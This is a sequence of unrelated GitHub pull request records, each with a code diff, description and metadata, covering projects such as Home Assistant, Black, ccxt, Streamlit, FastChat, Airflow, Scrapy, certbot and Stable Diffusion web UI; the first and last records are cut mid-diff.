+ data={
+ "source": "node",
+ "event": "ready",
+ "nodeId": node_id,
+ "nodeState": multisensor_6_state,
+ },
+ )
+ client.driver.receive_event(event)
+ await hass.async_block_till_done()
+
+ assert await async_setup_component(hass, "config", {})
+
+ # node ID based device identifier should be moved from the new hank device
+ # to the old multisensor device and both the old and new devices should exist.
+ old_device = dev_reg.async_get_device(identifiers={(DOMAIN, device_id)})
+ assert old_device
+ hank_device = dev_reg.async_get_device(identifiers={(DOMAIN, hank_device_id_ext)})
+ assert hank_device
+ assert hank_device != old_device
+ assert hank_device.identifiers == {(DOMAIN, hank_device_id_ext)}
+ multisensor_6_device = dev_reg.async_get_device(
+ identifiers={(DOMAIN, multisensor_6_device_id_ext)}
+ )
+ assert multisensor_6_device
+ assert multisensor_6_device == old_device
+ assert multisensor_6_device.identifiers == {
+ (DOMAIN, device_id),
+ (DOMAIN, multisensor_6_device_id_ext),
+ }
+
+ ws_client = await hass_ws_client(hass)
+
+ # Simulate the driver not being ready to ensure that the device removal handler
+ # does not crash
+ driver = client.driver
+ client.driver = None
+
+ await ws_client.send_json(
+ {
+ "id": 1,
+ "type": "config/device_registry/remove_config_entry",
+ "config_entry_id": integration.entry_id,
+ "device_id": hank_device.id,
+ }
+ )
+ response = await ws_client.receive_json()
+ assert not response["success"]
+
+ client.driver = driver
+
+ # Attempting to remove the hank device should pass, but removing the multisensor should not
+ await ws_client.send_json(
+ {
+ "id": 2,
+ "type": "config/device_registry/remove_config_entry",
+ "config_entry_id": integration.entry_id,
+ "device_id": hank_device.id,
+ }
+ )
+ response = await ws_client.receive_json()
+ assert response["success"]
+
+ await ws_client.send_json(
+ {
+ "id": 3,
+ "type": "config/device_registry/remove_config_entry",
+ "config_entry_id": integration.entry_id,
+ "device_id": multisensor_6_device.id,
+ }
+ )
+ response = await ws_client.receive_json()
+ assert not response["success"]
+
async def test_node_model_change(
hass: HomeAssistant, zp3111, client, integration
|
## Breaking change
Home Assistant Devices that represent Z-Wave JS nodes will persist even after the node has been removed. If the node has been removed, you can manually delete the device entry, but note that you will be unable to do so if the node is still known to the controller
## Proposed change
Due to issues reported in https://github.com/home-assistant/core/issues/80398 where the unique identifiers we use for devices randomly change, the integration was removing devices and recreating them, causing users to lose their entity customizations. To address this, when a node is being (re)registered in the device registry, if there is an existing device that has this node ID but has a different hardware based identifier, we will keep the old device and add a new one with the new hardware based identifier. This will allow a node to reassociate with the first device if the hardware signature changed because of an error and is later corrected. Additionally, users can remove the old device manually if it shouldn't be there.
## Type of change
<!--
What type of change does your PR introduce to Home Assistant?
NOTE: Please, check only 1! box!
If your PR requires multiple boxes to be checked, you'll most likely need to
split it into multiple PRs. This makes things easier and faster to code review.
-->
- [ ] Dependency upgrade
- [x] Bugfix (non-breaking change which fixes an issue)
- [ ] New integration (thank you!)
- [ ] New feature (which adds functionality to an existing integration)
- [ ] Deprecation (breaking change to happen in the future)
- [ ] Breaking change (fix/feature causing existing functionality to break)
- [ ] Code quality improvements to existing code or addition of tests
## Additional information
<!--
Details are important, and help maintainers processing your PR.
Please be sure to fill out additional details, if applicable.
-->
- This PR fixes or closes issue: fixes https://github.com/home-assistant/core/issues/80398
- This PR is related to issue:
- Link to documentation pull request:
## Checklist
<!--
Put an `x` in the boxes that apply. You can also fill these out after
creating the PR. If you're unsure about any of them, don't hesitate to ask.
We're here to help! This is simply a reminder of what we are going to look
for before merging your code.
-->
- [ ] The code change is tested and works locally.
- [ ] Local tests pass. **Your PR cannot be merged unless tests pass**
- [ ] There is no commented out code in this PR.
- [ ] I have followed the [development checklist][dev-checklist]
- [ ] I have followed the [perfect PR recommendations][perfect-pr]
- [ ] The code has been formatted using Black (`black --fast homeassistant tests`)
- [ ] Tests have been added to verify that the new code works.
If user exposed functionality or configuration variables are added/changed:
- [ ] Documentation added/updated for [www.home-assistant.io][docs-repository]
If the code communicates with devices, web services, or third-party tools:
- [ ] The [manifest file][manifest-docs] has all fields filled out correctly.
Updated and included derived files by running: `python3 -m script.hassfest`.
- [ ] New or updated dependencies have been added to `requirements_all.txt`.
Updated by running `python3 -m script.gen_requirements_all`.
- [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description.
- [ ] Untested files have been added to `.coveragerc`.
<!--
This project is very active and we have a high turnover of pull requests.
Unfortunately, the number of incoming pull requests is higher than what our
reviewers can review and merge so there is a long backlog of pull requests
waiting for review. You can help here!
By reviewing another pull request, you will help raise the code quality of
that pull request and the final review will be faster. This way the general
pace of pull request reviews will go up and your wait time will go down.
When picking a pull request to review, try to choose one that hasn't yet
been reviewed.
Thanks for helping out!
-->
To help with the load of incoming pull requests:
- [ ] I have reviewed two other [open pull requests][prs] in this repository.
[prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure
<!--
Thank you for contributing <3
Below, some useful links you could explore:
-->
[dev-checklist]: https://developers.home-assistant.io/docs/development_checklist/
[manifest-docs]: https://developers.home-assistant.io/docs/creating_integration_manifest/
[quality-scale]: https://developers.home-assistant.io/docs/integration_quality_scale_index/
[docs-repository]: https://github.com/home-assistant/home-assistant.io
[perfect-pr]: https://developers.home-assistant.io/docs/review-process/#creating-the-perfect-pr
|
https://api.github.com/repos/home-assistant/core/pulls/98145
|
2023-08-10T07:10:44Z
|
2024-01-30T02:36:41Z
|
2024-01-30T02:36:41Z
|
2024-01-31T03:01:44Z
| 3,621
|
home-assistant/core
| 39,074
|
Bump pre-commit/action from 2.0.2 to 2.0.3
|
diff --git a/.github/workflows/lint.yml b/.github/workflows/lint.yml
index 51f6d02e2e6..2f6c504d3f2 100644
--- a/.github/workflows/lint.yml
+++ b/.github/workflows/lint.yml
@@ -25,4 +25,4 @@ jobs:
python -m pip install -e '.[d]'
- name: Lint
- uses: pre-commit/[email protected]
+ uses: pre-commit/[email protected]
|
Bumps [pre-commit/action](https://github.com/pre-commit/action) from 2.0.2 to 2.0.3.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a href="https://github.com/pre-commit/action/releases">pre-commit/action's releases</a>.</em></p>
<blockquote>
<h2>pre-commit/[email protected]</h2>
<h3>Fixes</h3>
<ul>
<li><code>push</code> compatibility with <code>actions/checkout@v2</code> which checks out the branch
<ul>
<li><a href="https://github-redirect.dependabot.com/pre-commit/action/issues/97">#97</a> PR by <a href="https://github.com/jackton1"><code>@jackton1</code></a>.</li>
</ul>
</li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/pre-commit/action/commit/9b88afc9cd57fd75b655d5c71bd38146d07135fe"><code>9b88afc</code></a> Deployed to github pages</li>
<li>See full diff in <a href="https://github.com/pre-commit/action/compare/v2.0.2...v2.0.3">compare view</a></li>
</ul>
</details>
<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details>
|
https://api.github.com/repos/psf/black/pulls/2695
|
2021-12-15T02:21:35Z
|
2021-12-15T23:55:26Z
|
2021-12-15T23:55:26Z
|
2021-12-15T23:55:30Z
| 128
|
psf/black
| 24,471
|
Mexc fetchTickers : handleMarketTypeAndParams
|
diff --git a/js/mexc.js b/js/mexc.js
index f8bffbd271be..5470683ed6c5 100644
--- a/js/mexc.js
+++ b/js/mexc.js
@@ -653,13 +653,12 @@ module.exports = class mexc extends Exchange {
async fetchTickers (symbols = undefined, params = {}) {
await this.loadMarkets ();
- let marketType = undefined;
- [ marketType, params ] = this.handleMarketTypeAndParams ('fetchTickers', undefined, params);
+ const [ marketType, query ] = this.handleMarketTypeAndParams ('fetchTickers', undefined, params);
const method = this.getSupportedMapping (marketType, {
'spot': 'spotPublicGetMarketTicker',
'swap': 'contractPublicGetTicker',
});
- const response = await this[method] (this.extend (params));
+ const response = await this[method] (this.extend (query));
//
// {
// "success":true,
|
Adjusted handleMarketTypeAndParams so that it's on one line. Added margin market type.
|
https://api.github.com/repos/ccxt/ccxt/pulls/11510
|
2022-01-20T03:18:28Z
|
2022-01-23T06:06:56Z
|
2022-01-23T06:06:56Z
|
2022-01-23T06:06:56Z
| 226
|
ccxt/ccxt
| 13,463
|
Enable multipage apps by default
|
diff --git a/lib/streamlit/config.py b/lib/streamlit/config.py
index b763ff4ba4bc..42d701e699f8 100644
--- a/lib/streamlit/config.py
+++ b/lib/streamlit/config.py
@@ -725,15 +725,8 @@ def _browser_server_port() -> int:
_create_option(
"ui.hideSidebarNav",
- description="""
- Flag to hide the sidebar page navigation component.
-
- We have this default to True for now so that we can "soft-launch" the
- multipage apps feature and merge the feature branch into develop earlier.
- Once we're ready to have multipage apps enabled by default, we'll flip the
- default to False.
- """,
- default_val=True,
+ description="Flag to hide the sidebar page navigation component.",
+ default_val=False,
type_=bool,
visibility="hidden",
)
|
## 📚 Context
We initially merged the multipage apps PR with the `ui.hideSidebarNav` config option defaulting to
`True` to use the option as a kind of "feature flag" (we need the option either way in case we ever want
to turn off the nav component and instead build one into Cloud).
Now that we're closer to the release of the multipage apps feature, we can toggle the option to enable
MPAs by default.
- What kind of change does this PR introduce?
- [x] Feature
|
https://api.github.com/repos/streamlit/streamlit/pulls/4776
|
2022-05-25T23:43:32Z
|
2022-05-27T01:35:55Z
|
2022-05-27T01:35:55Z
|
2023-05-26T23:33:51Z
| 202
|
streamlit/streamlit
| 22,314
|
Fix mpt prompt template
|
diff --git a/fastchat/conversation.py b/fastchat/conversation.py
index c2235d7d7b..09778b27c9 100644
--- a/fastchat/conversation.py
+++ b/fastchat/conversation.py
@@ -19,6 +19,7 @@ class SeparatorStyle(Enum):
RWKV = auto()
PHOENIX = auto()
ROBIN = auto()
+ CHATML = auto()
@dataclasses.dataclass
@@ -127,6 +128,14 @@ def get_prompt(self) -> str:
else:
ret += role + ":\n"
return ret
+ elif self.sep_style == SeparatorStyle.CHATML:
+ ret = "" if self.system == "" else self.system + self.sep + "\n"
+ for role, message in self.messages:
+ if message:
+ ret += role + "\n" + message + self.sep + "\n"
+ else:
+ ret += role + "\n"
+ return ret
else:
raise ValueError(f"Invalid style: {self.sep_style}")
@@ -474,12 +483,11 @@ def get_conv_template(name: str) -> Conversation:
- You are a helpful assistant chatbot trained by MosaicML.
- You answer questions.
- You are excited to be able to help the user, but will refuse to do anything that could be considered harmful to the user.
-- You are more than just an information source, you are also able to write poetry, short stories, and make jokes.
-""",
+- You are more than just an information source, you are also able to write poetry, short stories, and make jokes.""",
roles=("<|im_start|>user", "<|im_start|>assistant"),
messages=(),
offset=0,
- sep_style=SeparatorStyle.ADD_NEW_LINE_SINGLE,
+ sep_style=SeparatorStyle.CHATML,
sep="<|im_end|>",
stop_token_ids=[50278, 0],
)
@@ -490,12 +498,11 @@ def get_conv_template(name: str) -> Conversation:
Conversation(
name="mpt-30b-chat",
system="""<|im_start|>system
-A conversation between a user and an LLM-based AI assistant. The assistant gives helpful and honest answers.
-""",
+A conversation between a user and an LLM-based AI assistant. The assistant gives helpful and honest answers.""",
roles=("<|im_start|>user", "<|im_start|>assistant"),
messages=(),
offset=0,
- sep_style=SeparatorStyle.ADD_NEW_LINE_SINGLE,
+ sep_style=SeparatorStyle.CHATML,
sep="<|im_end|>",
stop_token_ids=[50278, 0],
)
|
<!-- Thank you for your contribution! -->
<!-- Please add a reviewer to the assignee section when you create a PR. If you don't have the access to it, we will shortly find a reviewer and assign them to your PR. -->
## Why are these changes needed?
Fix mpt prompt template
<!-- Please give a short summary of the change and the problem this solves. -->
## Related issue number (if applicable)
<!-- For example: "Closes #1234" -->
#1783
## Checks
- [x] I've run `format.sh` to lint the changes in this PR.
- [x] I've included any doc changes needed.
- [ ] I've made sure the relevant tests are passing (if applicable).
|
https://api.github.com/repos/lm-sys/FastChat/pulls/1784
|
2023-06-26T16:34:49Z
|
2023-06-26T18:15:33Z
|
2023-06-26T18:15:33Z
|
2023-06-26T18:39:00Z
| 592
|
lm-sys/FastChat
| 41,163
|
Fix kerberos envs for workers in helm chart
|
diff --git a/chart/templates/workers/worker-deployment.yaml b/chart/templates/workers/worker-deployment.yaml
index bd3029a757e56..f418d6a17cd37 100644
--- a/chart/templates/workers/worker-deployment.yaml
+++ b/chart/templates/workers/worker-deployment.yaml
@@ -158,6 +158,12 @@ spec:
env:
{{- include "custom_airflow_environment" . | indent 10 }}
{{- include "standard_airflow_environment" . | indent 10 }}
+ {{- if .Values.workers.kerberosSidecar.enabled }}
+ - name: KRB5_CONFIG
+ value: {{ .Values.kerberos.configPath | quote }}
+ - name: KRB5CCNAME
+ value: {{ include "kerberos_ccache_path" . | quote }}
+ {{- end }}
{{- if $persistence }}
- name: worker-gc
image: {{ template "airflow_image" . }}
@@ -167,12 +173,6 @@ spec:
- name: logs
mountPath: {{ template "airflow_logs" . }}
{{- end }}
- {{- if .Values.workers.kerberosSidecar.enabled }}
- - name: KRB5_CONFIG
- value: {{ .Values.kerberos.configPath | quote }}
- - name: KRB5CCNAME
- value: {{ include "kerberos_ccache_path" . | quote }}
- {{- end }}
{{- if .Values.workers.kerberosSidecar.enabled }}
- name: worker-kerberos
image: {{ template "airflow_image" . }}
diff --git a/chart/tests/test_kerberos.py b/chart/tests/test_kerberos.py
index 4676f65a393a9..fd1431ee671ac 100644
--- a/chart/tests/test_kerberos.py
+++ b/chart/tests/test_kerberos.py
@@ -18,6 +18,8 @@
import json
import unittest
+import jmespath
+
from tests.helm_template_generator import render_chart
@@ -30,3 +32,30 @@ def test_kerberos_not_mentioned_in_render_if_disabled(self):
]
k8s_objects_to_consider_str = json.dumps(k8s_objects_to_consider)
assert "kerberos" not in k8s_objects_to_consider_str
+
+ def test_kerberos_envs_available_in_worker_with_persistence(self):
+ docs = render_chart(
+ values={
+ "executor": "CeleryExecutor",
+ "workers": {
+ "kerberosSidecar": {"enabled": True},
+ "persistence": {
+ "enabled": True,
+ },
+ },
+ "kerberos": {
+ "enabled": True,
+ "configPath": "/etc/krb5.conf",
+ "ccacheMountPath": "/var/kerberos-ccache",
+ "ccacheFileName": "ccache",
+ },
+ },
+ show_only=["templates/workers/worker-deployment.yaml"],
+ )
+
+ assert {"name": "KRB5_CONFIG", "value": "/etc/krb5.conf"} in jmespath.search(
+ "spec.template.spec.containers[0].env", docs[0]
+ )
+ assert {"name": "KRB5CCNAME", "value": "/var/kerberos-ccache/ccache"} in jmespath.search(
+ "spec.template.spec.containers[0].env", docs[0]
+ )
|
When worker log persistence is enabled in helm chart, KRB5_CONFIG and KRB5CCNAME envs do not get into worker container because worker-gc container is rendered before it.
**^ Add meaningful description above**
Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/master/CONTRIBUTING.rst#pull-request-guidelines)** for more information.
In case of fundamental code change, Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvements+Proposals)) is needed.
In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
In case of backwards incompatible changes please leave a note in [UPDATING.md](https://github.com/apache/airflow/blob/master/UPDATING.md).
|
https://api.github.com/repos/apache/airflow/pulls/13828
|
2021-01-22T08:38:05Z
|
2021-01-24T17:09:40Z
|
2021-01-24T17:09:40Z
|
2021-01-24T22:42:10Z
| 787
|
apache/airflow
| 14,781
|
Link to Zyte’s export guides
|
diff --git a/docs/topics/feed-exports.rst b/docs/topics/feed-exports.rst
index 700775e4bb6..f64bbac06a0 100644
--- a/docs/topics/feed-exports.rst
+++ b/docs/topics/feed-exports.rst
@@ -13,6 +13,11 @@ Scrapy provides this functionality out of the box with the Feed Exports, which
allows you to generate feeds with the scraped items, using multiple
serialization formats and storage backends.
+This page provides detailed documentation for all feed export features. If you
+are looking for a step-by-step guide, check out `Zyte’s export guides`_.
+
+.. _Zyte’s export guides: https://docs.zyte.com/web-scraping/guides/export/index.html#exporting-scraped-data
+
.. _topics-feed-format:
Serialization formats
|
https://api.github.com/repos/scrapy/scrapy/pulls/6183
|
2023-12-20T11:48:26Z
|
2023-12-20T17:22:22Z
|
2023-12-20T17:22:22Z
|
2023-12-20T17:22:22Z
| 190
|
scrapy/scrapy
| 34,261
|
|
When device is MPS, use CPU for GFPGAN instead
|
diff --git a/modules/devices.py b/modules/devices.py
index ff82f2f64bb..5d9c7a0767c 100644
--- a/modules/devices.py
+++ b/modules/devices.py
@@ -33,7 +33,7 @@ def enable_tf32():
errors.run(enable_tf32, "Enabling TF32")
device = get_optimal_device()
-device_codeformer = cpu if has_mps else device
+device_gfpgan = device_codeformer = cpu if device.type == 'mps' else device
dtype = torch.float16
def randn(seed, shape):
diff --git a/modules/gfpgan_model.py b/modules/gfpgan_model.py
index dd3fbcab186..f1a564b732f 100644
--- a/modules/gfpgan_model.py
+++ b/modules/gfpgan_model.py
@@ -21,7 +21,7 @@ def gfpgann():
global loaded_gfpgan_model
global model_path
if loaded_gfpgan_model is not None:
- loaded_gfpgan_model.gfpgan.to(shared.device)
+ loaded_gfpgan_model.gfpgan.to(devices.device_gfpgan)
return loaded_gfpgan_model
if gfpgan_constructor is None:
@@ -36,8 +36,8 @@ def gfpgann():
else:
print("Unable to load gfpgan model!")
return None
- model = gfpgan_constructor(model_path=model_file, upscale=1, arch='clean', channel_multiplier=2, bg_upsampler=None)
- model.gfpgan.to(shared.device)
+ model = gfpgan_constructor(model_path=model_file, upscale=1, arch='clean', channel_multiplier=2, bg_upsampler=None, device=devices.device_gfpgan)
+ model.gfpgan.to(devices.device_gfpgan)
loaded_gfpgan_model = model
return model
|
Attempting to use MPS for GFPGAN results in an unchanged image, so fall back to CPU instead so that GFPGAN works correctly. See issue #1367.
|
https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/1424
|
2022-10-01T04:16:57Z
|
2022-10-04T12:20:12Z
|
2022-10-04T12:20:12Z
|
2022-10-04T12:20:12Z
| 429
|
AUTOMATIC1111/stable-diffusion-webui
| 39,811
|
Add readthedocs requirements files
|
diff --git a/certbot-dns-cloudflare/readthedocs.org.requirements.txt b/certbot-dns-cloudflare/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..b18901111fa
--- /dev/null
+++ b/certbot-dns-cloudflare/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-cloudflare[docs]
diff --git a/certbot-dns-cloudxns/readthedocs.org.requirements.txt b/certbot-dns-cloudxns/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..ae2ff8165e5
--- /dev/null
+++ b/certbot-dns-cloudxns/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-cloudxns[docs]
diff --git a/certbot-dns-digitalocean/readthedocs.org.requirements.txt b/certbot-dns-digitalocean/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..08d973ab36e
--- /dev/null
+++ b/certbot-dns-digitalocean/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-digitalocean[docs]
diff --git a/certbot-dns-dnsimple/readthedocs.org.requirements.txt b/certbot-dns-dnsimple/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..fef73916c6a
--- /dev/null
+++ b/certbot-dns-dnsimple/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-dnsimple[docs]
diff --git a/certbot-dns-dnsmadeeasy/readthedocs.org.requirements.txt b/certbot-dns-dnsmadeeasy/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..8f8c6c7316a
--- /dev/null
+++ b/certbot-dns-dnsmadeeasy/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-dnsmadeeasy[docs]
diff --git a/certbot-dns-google/readthedocs.org.requirements.txt b/certbot-dns-google/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..6ea393f866f
--- /dev/null
+++ b/certbot-dns-google/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-google[docs]
diff --git a/certbot-dns-luadns/readthedocs.org.requirements.txt b/certbot-dns-luadns/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..acb51e4eff0
--- /dev/null
+++ b/certbot-dns-luadns/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-luadns[docs]
diff --git a/certbot-dns-nsone/readthedocs.org.requirements.txt b/certbot-dns-nsone/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..dbdee4480bb
--- /dev/null
+++ b/certbot-dns-nsone/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-nsone[docs]
diff --git a/certbot-dns-rfc2136/readthedocs.org.requirements.txt b/certbot-dns-rfc2136/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..df89018ceff
--- /dev/null
+++ b/certbot-dns-rfc2136/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-rfc2136[docs]
diff --git a/certbot-dns-route53/readthedocs.org.requirements.txt b/certbot-dns-route53/readthedocs.org.requirements.txt
new file mode 100644
index 00000000000..660a90d0e9e
--- /dev/null
+++ b/certbot-dns-route53/readthedocs.org.requirements.txt
@@ -0,0 +1,12 @@
+# readthedocs.org gives no way to change the install command to "pip
+# install -e .[docs]" (that would in turn install documentation
+# dependencies), but it allows to specify a requirements.txt file at
+# https://readthedocs.org/dashboard/letsencrypt/advanced/ (c.f. #259)
+
+# Although ReadTheDocs certainly doesn't need to install the project
+# in --editable mode (-e), just "pip install .[docs]" does not work as
+# expected and "pip install -e .[docs]" must be used instead
+
+-e acme
+-e .
+-e certbot-dns-route53[docs]
|
As part of #5564, I'm setting up Read the Docs for each of our DNS plugins. To do this, we need to tell Read the Docs how to install the plugin so it can build the documentation about it. We have similar files in the root of the repo and the `acme`, `certbot-apache`, `certbot-compatibility-test`, `certbot-nginx`, and `letshelp-certbot` directories.
Despite us having broken lockstep, we should still have each plugin install the latest version of `acme`/`certbot` so the build still works when the version of the plugin in `master` is relying on changes in an unreleased version of `acme`/`certbot`.
While not what we should be doing long term, for the purposes of testing this PR I set up the Cloudflare docs to use this branch. You can see the docs at: https://certbot-dns-cloudflare.readthedocs.io/en/latest/
|
https://api.github.com/repos/certbot/certbot/pulls/5696
|
2018-03-09T00:51:40Z
|
2018-03-09T01:24:31Z
|
2018-03-09T01:24:31Z
|
2018-03-09T01:24:33Z
| 2,328
|
certbot/certbot
| 1,238
|
fix: add compatibility for LoRAs in a1111 metadata scheme
|
diff --git a/modules/config.py b/modules/config.py
index 6c02ca13f..b81e218a0 100644
--- a/modules/config.py
+++ b/modules/config.py
@@ -539,6 +539,7 @@ def add_ratio(x):
sdxl_lcm_lora = 'sdxl_lcm_lora.safetensors'
sdxl_lightning_lora = 'sdxl_lightning_4step_lora.safetensors'
+loras_metadata_remove = [sdxl_lcm_lora, sdxl_lightning_lora]
def get_model_filenames(folder_paths, extensions=None, name_filter=None):
diff --git a/modules/meta_parser.py b/modules/meta_parser.py
index 8cd21cbca..70ab8860c 100644
--- a/modules/meta_parser.py
+++ b/modules/meta_parser.py
@@ -1,5 +1,4 @@
import json
-import os
import re
from abc import ABC, abstractmethod
from pathlib import Path
@@ -12,7 +11,7 @@
import modules.sdxl_styles
from modules.flags import MetadataScheme, Performance, Steps
from modules.flags import SAMPLERS, CIVITAI_NO_KARRAS
-from modules.util import quote, unquote, extract_styles_from_prompt, is_json, get_file_from_folder_list, calculate_sha256
+from modules.util import quote, unquote, extract_styles_from_prompt, is_json, get_file_from_folder_list, sha256
re_param_code = r'\s*(\w[\w \-/]+):\s*("(?:\\.|[^\\"])+"|[^,]*)(?:,|$)'
re_param = re.compile(re_param_code)
@@ -110,7 +109,8 @@ def get_steps(key: str, fallback: str | None, source_dict: dict, results: list,
assert h is not None
h = int(h)
# if not in steps or in steps and performance is not the same
- if h not in iter(Steps) or Steps(h).name.casefold() != source_dict.get('performance', '').replace(' ', '_').casefold():
+ if h not in iter(Steps) or Steps(h).name.casefold() != source_dict.get('performance', '').replace(' ',
+ '_').casefold():
results.append(h)
return
results.append(-1)
@@ -204,7 +204,8 @@ def get_lora(key: str, fallback: str | None, source_dict: dict, results: list):
def get_sha256(filepath):
global hash_cache
if filepath not in hash_cache:
- hash_cache[filepath] = calculate_sha256(filepath)
+ # is_safetensors = os.path.splitext(filepath)[1].lower() == '.safetensors'
+ hash_cache[filepath] = sha256(filepath)
return hash_cache[filepath]
@@ -231,8 +232,9 @@ def parse_meta_from_preset(preset_content):
height = height[:height.index(" ")]
preset_prepared[meta_key] = (width, height)
else:
- preset_prepared[meta_key] = items[settings_key] if settings_key in items and items[settings_key] is not None else getattr(modules.config, settings_key)
-
+ preset_prepared[meta_key] = items[settings_key] if settings_key in items and items[
+ settings_key] is not None else getattr(modules.config, settings_key)
+
if settings_key == "default_styles" or settings_key == "default_aspect_ratio":
preset_prepared[meta_key] = str(preset_prepared[meta_key])
@@ -288,6 +290,12 @@ def set_data(self, raw_prompt, full_prompt, raw_negative_prompt, full_negative_p
lora_hash = get_sha256(lora_path)
self.loras.append((Path(lora_name).stem, lora_weight, lora_hash))
+ @staticmethod
+ def remove_special_loras(lora_filenames):
+ for lora_to_remove in modules.config.loras_metadata_remove:
